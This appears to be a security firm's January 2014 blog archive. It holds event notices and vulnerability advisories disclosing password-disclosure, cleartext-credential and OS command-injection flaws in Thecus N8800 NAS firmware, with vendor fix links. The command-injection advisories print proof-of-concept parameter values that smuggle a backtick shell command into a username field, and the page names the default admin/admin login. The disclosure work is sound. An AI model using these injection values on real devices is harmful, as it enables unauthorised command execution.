Archives for January 2014

Cyber Security 2014

Our CEO David Stubley will be opening the Cyber Security 2014 conference at the Gogarburn Conference Centre, RBS World Headquarters, Edinburgh next Thursday 6th February 2014.

His talk will be on ‘Cyber Security: Setting the Scene‘.

During this talk David will explore the question of “What is Cyber Security?” Using real life case studies David will provide insight into the current and future threats faced by UK businesses.

More information on the event can be found here.

 

OWASP AppSec Eu 2014

OWASP AppSec Europe is returning to the United Kingdom in 2014 and 7 Elements are proud to announce that we will be sponsoring this event.

Hosted this year in Cambridge, the event will take place from the 23rd to the 26th of June and will include:

  • Two days of training and a two day conference
  • Three tracks, focusing on the core OWASP mission (Builder, Breaker, Defender), with an added Research track
  • Keynote addresses by highly respected Industry experts

Update from Thecus

On the 28th January, Thecus made further contact with our team to advise of fixes to the vulnerable firmware reported by 7 Elements, please see our blog for further details.

CVE-2013-5668 Thecus NAS Server Domain Administrator Password Disclosure

Advisory Information

Title: Thecus NAS Server Domain Administrator Password Disclosure

Date published: 13 January 2014

Reference: CVE-2013-5668

Advisory Summary

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI.

Vendor

Thecus <http://www.thecus.com/>

Affected Software

Thecus NAS Server N8800 Firmware 5.03.01

Description of Issue

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI. Any user who has access to this page is able to retrieve the ADS/NT administrator ID and password. This could enable an attacker to gain access to the domain hosting the storage server.

PoC

Attackers can use a browser to exploit these issues.

Fix

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom

 

CVE-2013-5669 Thecus NAS Server Plain Text Administrative Password

Advisory Information

Title: Thecus NAS Server Plain Text Administrative Password

Date published: 13 January 2014

Reference: CVE-2013-5669

Advisory Summary

The Network Attached Storage (NAS) Administration Web Page for Thecus NAS Server N8800 transmits passwords in cleartext by default, which allows remote attackers to sniff the administrative password.

Vendor

Thecus <http://www.thecus.com/>

Affected Software

Thecus NAS Server N8800 Firmware 5.03.01

Description of Issue

The issue exists because by default the Thecus NAS Server N8800 sends NAS administrative authentication credentials in plaintext across the network. The credentials may be disclosed to attackers with the ability to intercept network traffic, which may enable them to gain unauthorised access to the NAS administrative interface.

PoC

Attackers can use a browser to exploit these issues.

Fix

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom

 

Multiple vulnerabilities in Thecus NAS

Introduction

During an internal infrastructure test last year, we identified a Network Attached Storage (NAS) device that piqued our interest, primarily due to the administration web page being served over HTTP and not HTTPS. Generally not a good sign from a security point of view!

A few moments later and with access to the device granted through the use of default administrator password (admin | admin) we had the opportunity to take a look around the management portal and in a short amount of time, we were able to identify a number of interesting security vulnerabilities. Of note would be disclosure of the domain account in use within the enterprise and the ability to conduct OS command injection attacks against the device itself.

The device in question is the Thecus NAS Server, version N8800 running Firmware 5.03.01.

It should be noted that the default configuration for the device allows for the administrative interface to be available via HTTP. This makes it possible to intercept and manipulate the traffic between a device operator and the device. The credentials submitted to the administrative interface would be vulnerable and would be intercepted and read by a well-positioned malicious agent. During further investigations, we have identified over 100 devices running this version of the Thecus NAS with Internet facing access enabled, therefore increasing the potential attack surface against this type of device.

Detail

The following two vulnerabilities were of particular note.

  1. Domain account password disclosure (CVE-2013-5668).
  2. OS Command Injection (CVE-2013-5667).

Domain account password disclosure

After gaining access to the device’s configuration webpage, it was possible to see credentials configured on the NAS. They were stored in plain text and were shown in the webpage’s source. The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI. Any user who has access to this page is able to retrieve the ADS/NT administrator ID and password. This could enable an attacker to gain access to the domain hosting the storage server.

Thecus

 

OS Command Injection

The issue exists because the application accepts user input through the get_userid parameter that can be used to create OS commands that are redirected to the operating system. An attacker can use this flaw to execute arbitrary commands.

 Proof of Concept

We have generated a proof of concept (PoC) to prove the existence of this issue. Firstly to baseline how the device handles requests, we will use the following valid request:

get_userid=1&username=sales

Which generates the following response:

{"get_userid":"1456","groupname":false,"data":[]}

Command Injection PoC:

1. Write string for user admin to /tmp

get_userid=1&username=user1`echo+sales+>+/tmp/xpto`

2. Read value from /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{"get_userid":"1456","groupname":false,"data":[]}

The response shows that we have been able to directly execute OS level commands. In our proof of concept, the string ‘sales’ (1456) was written to the /tmp directory of the NAS device. In step two this value is then able to be recalled from the /tmp file, proving that we are able to execute commands. This type of vulnerability could enable an attacker to gain full control of the device.

Disclosure

Back in August 2013, we engaged with Thecus to raise three security issues. Since that point, we have tried on multiple occasions to engage with Thecus to help them understand these issues. Unfortunately this has not been successful and the lack of engagement from Thecus is disappointing with all communication handled though their generic support system.

The responses received to our questions suggested a lack of security awareness and understanding of the potential impact to Thecus’ customers. The support team has also failed to understand that the issues raised could impact on multiple platforms and not just the single device / firmware version that we were able to identify. They have also not asked any further questions that would help them in gaining this understanding.

After sending the following message to the support team, the ticket was closed by Thecus:

“We raised this issue 73 days ago with you. As the issues are security related, we would look to issue public advisories as soon as patches or work arounds are available and as such would prefer to coordinate any notification with you.”

The closure of the ticket, suggests that Thecus does not wish to engage in any further discussion on the security issues identified or work with our organisation in the managed disclosure of the vulnerabilities. After this point we started working with the CERT Coordination Center (CERT/CC) to progress this issue. CERT/CC has not recieved any communication from Thecus on this matter. Details of these vulnerabilities have now been released as part of their responsible disclosure policy.

https://www.7elements.co.uk/news/cve-2013-5667/ (CVE Entry)

https://www.7elements.co.uk/news/cve-2013-5668/  (CVE Entry)

https://www.7elements.co.uk/news/cve-2013-5669/ (CVE Entry)

At the time of publishing this blog, there are still no security updates from Thecus. For users of the vulnerable platform, we would recommend that users change default credentials and configure the device to use HTTPS only. Further to this and due to the potential for OS command injection, we would advice that network level filtering be implemented to restrict access to the device.

Update

On the 28th January, Thecus made further contact with our team to advise of fixes to the vulnerable firmware and provided the following response:

“Thanks to your detailed emails, we have released an updated version of our firmware for units running ThecusOS 5 (please see links below) and will be providing similar updates to our ThecusOS 6 models within a month (updates for OS 6 can be automatically downloaded and installed via the UI).”

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom

“Again, please accept our thanks for your engagement and patience, you have our sincere gratitude.”

CVE-2013-5667 Thecus NAS Server get_userid OS Command Injection

Advisory Information

Title: Thecus NAS Server get_userid OS Command Injection

Date published: 13 January 2014

Reference: CVE-2013-5667

Advisory Summary

A lack of input validation allows an attacker to execute OS commands directly on the operating system.

Vendor

Thecus <http://www.thecus.com/>

Affected Software

Thecus NAS Server N8800 Firmware 5.03.01

Description of Issue

The issue exists because the application accepts user input through the get_userid parameter that can be used to create OS commands that are redirected to the operating system. An attacker can use this flaw to execute arbitrary commands.

Proof of Concept

Standard request:

get_userid=1&username=admin

Response:

{"get_userid":"1001","groupname":false,"data":[]}

Command Injection PoC:

1. Write value for user admin to /tmp

get_userid=1&username=admin`echo+admin+>+/tmp/xpto`

2. Display value of /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{"get_userid":"1001","groupname":false,"data":[]}

Fix

ThecusOS 5 (32 bit):

http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom

ThecusOS 5 (64 bit):

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N6850_N8850_N10850_N8900_N12000_N16000.rom

http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom

 

ICO issue BYOD advice

ICO issue BYOD advice.

The Information Commissioner’s Office (ICO) has recently issued advice for companies with regards to BYOD (Bring Your Own Device). This guidance explores what you need to consider if permitting the use of personal devices to process personal data for which you are responsible. The ICO document can be found here:

ico_bring_your_own_device_byod_guidance